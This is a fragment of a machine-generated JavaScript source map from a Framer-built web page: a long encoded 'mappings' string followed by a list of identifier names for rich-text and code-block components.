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",
  "names": ["init_ssg_sandbox_shims", "richText", "u", "x", "p", "Link", "motion", "richText1", "ComponentPresetsConsumer", "t", "CodeBlock_default", "richText2", "richText3", "richText4", "richText5", "richText6", "richText7", "richText8", "richText9", "richText10", "richText11", "richText12", "richText13", "richText14", "__FramerMetadata__"]
}